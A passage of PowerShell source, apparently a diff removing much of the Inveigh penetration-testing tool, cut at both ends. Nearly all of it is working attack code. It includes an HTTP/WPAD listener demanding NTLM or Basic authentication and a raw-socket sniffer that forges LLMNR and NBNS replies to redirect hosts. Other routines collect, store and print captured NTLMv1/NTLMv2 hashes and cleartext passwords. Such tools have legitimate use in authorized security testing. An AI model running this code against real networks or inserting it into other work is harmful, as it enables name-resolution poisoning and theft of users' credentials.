[System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) - } - elseif($inveigh.HTTP_default_file -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))) - { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) - } - elseif($inveigh.WPAD_response -and $inveigh.request.RawUrl -match '/wpad.dat') - { - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response) - } - else - { - - if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) - { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) - } - else - { - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response) - } - - } - - } - else - { - - if($inveigh.request.RawUrl -match '/wpad.dat') - { - $inveigh.message = $inveigh.WPAD_response - } - elseif($inveigh.HTTP_response) - { - $inveigh.message = $inveigh.HTTP_response - } - else - { - $inveigh.message = $null - } - - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) - } - } - else - { - [Byte[]] $HTTP_buffer = $null - } - - if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth) - { - $inveigh.response.AddHeader("WWW-Authenticate",$NTLM) - } - elseif(($HTTPAuth -eq 'Basic' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $inveigh.request.RawUrl -match '/wpad.dat')) - { - $inveigh.response.AddHeader("WWW-Authenticate","Basic realm=$HTTPBasicRealm") - } - else - { - $inveigh.response.StatusCode = 200 - } - - $inveigh.response.ContentLength64 = $HTTP_buffer.Length - $HTTP_stream = $inveigh.response.OutputStream - $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length) - $HTTP_stream.Close() - } - - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() -} - -# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer -$sniffer_scriptblock = -{ - param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$RunTime,$LLMNRTTL,$NBNSTTL) - - $byte_in = New-Object System.Byte[] 4 - $byte_out = New-Object System.Byte[] 4 - $byte_data = New-Object System.Byte[] 4096 - $byte_in[0] = 1 - $byte_in[1-3] = 0 - $byte_out[0] = 1 - $byte_out[1-3] = 0 - $inveigh.sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP) - $inveigh.sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true) - $inveigh.sniffer_socket.ReceiveBufferSize = 1024 - $end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]"$IP",0) - $inveigh.sniffer_socket.Bind($end_point) - $inveigh.sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out) - $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) - [Array]::Reverse($LLMNR_TTL_bytes) - $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) - [Array]::Reverse($NBNS_TTL_bytes) - - if($RunTime) - { - $sniffer_timeout = new-timespan -Minutes $RunTime - $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - } - - while($inveigh.running) - { - $packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None) - $memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data) - $binary_reader = New-Object System.IO.BinaryReader($memory_stream) - $version_HL = $binary_reader.ReadByte() - $type_of_service= $binary_reader.ReadByte() - $total_length = DataToUInt16 $binary_reader.ReadBytes(2) - $identification = $binary_reader.ReadBytes(2) - $flags_offset = $binary_reader.ReadBytes(2) - $TTL = $binary_reader.ReadByte() - $protocol_number = $binary_reader.ReadByte() - $header_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16()) - $source_IP_bytes = $binary_reader.ReadBytes(4) - $source_IP = [System.Net.IPAddress]$source_IP_bytes - $destination_IP_bytes = $binary_reader.ReadBytes(4) - $destination_IP = [System.Net.IPAddress]$destination_IP_bytes - $IP_version = [Int]"0x$(('{0:X}' -f $version_HL)[0])" - $header_length = [Int]"0x$(('{0:X}' -f $version_HL)[1])" * 4 - - switch($protocol_number) - { - - 6 - { # TCP - $source_port = DataToUInt16 $binary_reader.ReadBytes(2) - $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) - $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4) - $ack_number = DataToUInt32 $binary_reader.ReadBytes(12) - $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 - $TCP_flags = $binary_reader.ReadByte() - $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2) - $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16()) - $TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2) - $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) - - switch ($destination_port) - { - - 139 - { - if($SMB -eq 'Y') - { - SMBNTLMResponse $payload_bytes - } - } - - 445 - { - - if($SMB -eq 'Y') - { - SMBNTLMResponse $payload_bytes - } - - } - - } - - # Outgoing packets - switch ($source_port) - { - - 139 - { - - if($SMB -eq 'Y') - { - $NTLM_challenge = SMBNTLMChallenge $payload_bytes - } - - } - - 445 - { - - if($SMB -eq 'Y') - { - $NTLM_challenge = SMBNTLMChallenge $payload_bytes - } - - } - - } - - } - - 17 - { # UDP - $source_port = $binary_reader.ReadBytes(2) - $endpoint_source_port = DataToUInt16 ($source_port) - $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) - $UDP_length = $binary_reader.ReadBytes(2) - $UDP_length_uint = DataToUInt16 ($UDP_length) - $binary_reader.ReadBytes(2) - $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4) - - # Incoming packets - switch ($destination_port) - { - - 137 # NBNS - { - - if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP) - { - $UDP_length[0] += 16 - - $NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] + - $NBNS_TTL_bytes + - 0x00,0x06,0x00,0x00 + - ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + - 0x00,0x00,0x00,0x00 - - $NBNS_response_packet = 0x00,0x89 + - $source_port[1,0] + - $UDP_length[1,0] + - 0x00,0x00 + - $payload_bytes[0,1] + - 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + - $NBNS_response_data - - $send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port) - $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44]) - - switch ($NBNS_query_type) - { - - '41-41' - { - $NBNS_query_type = '00' - } - - '41-44' - { - $NBNS_query_type = '03' - } - - '43-41' - { - $NBNS_query_type = '20' - } - - '42-4C' - { - $NBNS_query_type = '1B' - } - - '42-4D' - { - $NBNS_query_type = '1C' - } - - '42-4E' - { - $NBNS_query_type = '1D' - } - - '42-4F' - { - $NBNS_query_type = '1E' - } - - } - - $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)]) - $NBNS_query = $NBNS_query -replace "-00","" - $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) - $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) - $NBNS_query_string_subtracted = "" - $NBNS_query_string = "" - $n = 0 - - do - { - $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) - $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) - $n += 1 - } - until($n -gt ($NBNS_query_string_encoded.Length - 1)) - - $n = 0 - - do - { - $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) - $n += 2 - } - until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) - - if($NBNS -eq 'Y') - { - - if($NBNSTypes -contains $NBNS_query_type) - { - - if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString)) - { - $send_socket.sendTo($NBNS_response_packet,$destination_point) - $send_socket.Close() - $NBNS_response_message = "- spoofed response has been sent" - } - else - { - - if($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) - { - $NBNS_response_message = "- $NBNS_query_string is not on reply list" - } - elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) - { - $NBNS_response_message = "- $NBNS_query_string is on ignore list" - } - elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) - { - $NBNS_response_message = "- $source_IP is not on reply list" - } - elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) - { - $NBNS_response_message = "- $source_IP is on ignore list" - } - else - { - $NBNS_response_message = "- not spoofed due to previous capture" - } - - } - - } - else - { - $NBNS_response_message = "- spoof not sent due to disabled type" - } - - } - - $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) - } - } - - 5355 # LLMNR - { - - if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length - 3)]) -ne '00-1c') # ignore AAAA for now - { - $UDP_length[0] += $payload_bytes.Length - 2 - $LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length] - - $LLMNR_response_data += $LLMNR_response_data + - $LLMNR_TTL_bytes + - 0x00,0x04 + - ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() - - $LLMNR_response_packet = 0x14,0xeb + - $source_port[1,0] + - $UDP_length[1,0] + - 0x00,0x00 + - $payload_bytes[0,1] + - 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + - $LLMNR_response_data - - $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)]) - $LLMNR_query = $LLMNR_query -replace "-00","" - $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length) - - if($LLMNR -eq 'Y') - { - - if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString)) - { - $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) - $send_socket.SendTo($LLMNR_response_packet,$destination_point) - $send_socket.Close() - $LLMNR_response_message = "- spoofed response has been sent" - } - else - { - - if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string) - { - $LLMNR_response_message = "- $LLMNR_query_string is not on reply list" - } - elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string) - { - $LLMNR_response_message = "- $LLMNR_query_string is on ignore list" - } - elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) - { - $LLMNR_response_message = "- $source_IP is not on reply list" - } - elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) - { - $LLMNR_response_message = "- $source_IP is on ignore list" - } - else - { - $LLMNR_response_message = "- not spoofed due to previous capture" - } - - } - - } - - $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) - } - } - - } - } - - } - - if($RunTime) - { - - if($sniffer_stopwatch.Elapsed -ge $sniffer_timeout) - { - - if($inveigh.HTTP_listener.IsListening) - { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() - } - - if($inveigh.relay_running) - { - $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) - Start-Sleep -m 5 - $inveigh.relay_running = $false - } - - $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")]) - Start-Sleep -m 5 - $inveigh.running = $false - - if($inveigh.HTTPS) - { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - - try - { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() - } - catch - { - - if($inveigh.status_output) - { - $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually") - } - - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } - - } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - } - - if($inveigh.file_output) - { - while($inveigh.log_file_queue.Count -gt 0) - { - $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv1_file_queue.Count -gt 0) - { - $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv2_file_queue.Count -gt 0) - { - $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) - } - - while($inveigh.cleartext_file_queue.Count -gt 0) - { - $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) - } - - } - - } - - $binary_reader.Close() - $memory_stream.Dispose() - $memory_stream.Close() -} - -# End ScriptBlocks -# Begin Startup Functions - -# HTTP/HTTPS Listener Startup Function -function HTTPListener() -{ - $inveigh.HTTP_listener = New-Object System.Net.HttpListener - - if($inveigh.HTTP) - { - $inveigh.HTTP_listener.Prefixes.Add('http://*:80/') - } - - if($inveigh.HTTPS) - { - $inveigh.HTTP_listener.Prefixes.Add('https://*:443/') - } - - $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" - $inveigh.HTTP_listener.Start() - $HTTP_runspace = [RunspaceFactory]::CreateRunspace() - $HTTP_runspace.Open() - $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) - $HTTP_powershell = [PowerShell]::Create() - $HTTP_powershell.Runspace = $HTTP_runspace - $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument( - $HTTPBasicRealm).AddArgument($WPADAuth) > $null - $HTTP_powershell.BeginInvoke() > $null -} - -# Sniffer/Spoofer Startup Function -function SnifferSpoofer() -{ - $sniffer_runspace = [RunspaceFactory]::CreateRunspace() - $sniffer_runspace.Open() - $sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) - $sniffer_powershell = [PowerShell]::Create() - $sniffer_powershell.Runspace = $sniffer_runspace - $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument( - $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument( - $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( - $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( - $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null - $sniffer_powershell.BeginInvoke() > $null -} - -# End Startup Functions - -# Startup Enabled Services - -# HTTP Server Start -if(($inveigh.HTTP -or $inveigh.HTTPS) -and $SMBRelay -eq 'N') -{ - HTTPListener -} - -# Sniffer/Spoofer Start - always enabled -SnifferSpoofer - -if($inveigh.console_output) -{ - - if($ConsoleStatus) - { - $console_status_timeout = new-timespan -Minutes $ConsoleStatus - $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - } - - :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) - { - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - - if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) - { - - if($inveigh.cleartext_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline) - $inveigh.cleartext_list.Sort() - - foreach($unique_cleartext in $inveigh.cleartext_list) - { - if($unique_cleartext -ne $unique_cleartext_last) - { - Write-Output($unique_cleartext + $inveigh.newline) - } - - $unique_cleartext_last = $unique_cleartext - } - - Start-Sleep -m 5 - } - else - { - Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) - } - - if($inveigh.NTLMv1_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) - $inveigh.NTLMv1_list.Sort() - - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) - { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output($unique_NTLMv1 + $inveigh.newline) - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } - - $unique_NTLMv1_account_last = '' - Start-Sleep -m 5 - Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) - - foreach($NTLMv1_username in $inveigh.NTLMv1_username_list) - { - Write-Output($NTLMv1_username + $inveigh.newline) - } - - Start-Sleep -m 5 - } - else - { - Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) - } - - if($inveigh.NTLMv2_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) - $inveigh.NTLMv2_list.Sort() - - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output($unique_NTLMv2 + $inveigh.newline) - } - - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - - $unique_NTLMv2_account_last = '' - Start-Sleep -m 5 - Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) - - foreach($NTLMv2_username in $inveigh.NTLMv2_username_list) - { - Write-Output($NTLMv2_username + $inveigh.newline) - } - - } - else - { - Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) - } - - $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - - } - - if($inveigh.console_input) - { - - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - } - - Start-Sleep -m 5 - } - -} - -} -#End Invoke-Inveigh - -function Stop-Inveigh -{ - <# - .SYNOPSIS - Stop-Inveigh will stop all running Inveigh functions. - #> - - if($inveigh) - { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) - { - - if($inveigh.HTTP_listener.IsListening) - { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() - } - - if($inveigh.bruteforce_running) - { - $inveigh.bruteforce_running = $false - Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - Write-Output("Inveigh Brute Force exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Brute Force exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Brute Force exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - if($inveigh.relay_running) - { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - if($inveigh.running) - { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - } - else - { - Write-Output("There are no running Inveigh functions") - } - - if($inveigh.HTTPS) - { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - - try - { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() - } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } - } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - else - { - Write-Output("There are no running Inveigh functions")|Out-Null - } - -} - -function Get-Inveigh -{ - <# - .SYNOPSIS - Get-Inveigh will display queued Inveigh console output. - #> - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - -} - -function Get-InveighCleartext -{ - <# - .SYNOPSIS - Get-InveighCleartext will get all captured cleartext credentials. - - .PARAMETER Unique - Display only unique cleartext credentials. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if($Unique) - { - Write-Output $inveigh.cleartext_list | Get-Unique - } - else - { - Write-Output $inveigh.cleartext_list - } - -} - -function Get-InveighNTLMv1 -{ - <# - .SYNOPSIS - Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if ($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } - - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } - - if($Unique) - { - $inveigh.NTLMv1_list.Sort() - - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) - { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output $unique_NTLMv1 - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv1_username_list - } - else - { - Write-Output $inveigh.NTLMv1_list - } - -} - -function Get-InveighNTLMv2 -{ - <# - .SYNOPSIS - Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } - - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } - - if($Unique) - { - $inveigh.NTLMv2_list.Sort() - - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output $unique_NTLMv2 - } - - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv2_username_list - } - else - { - Write-Output $inveigh.NTLMv2_list - } - -} - -function Get-InveighLog -{ - <# - .SYNOPSIS - Get-InveighLog will get log entries. - #> - - Write-Output $inveigh.log -} - -function Watch-Inveigh -{ - <# - .SYNOPSIS - Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. - #> - - if($inveigh.tool -ne 1) - { - - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) - { - Write-Output "Press any key to stop real time console output" - $inveigh.console_output = $true - - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) - { - - while($inveigh.console_queue.Count -gt 0) 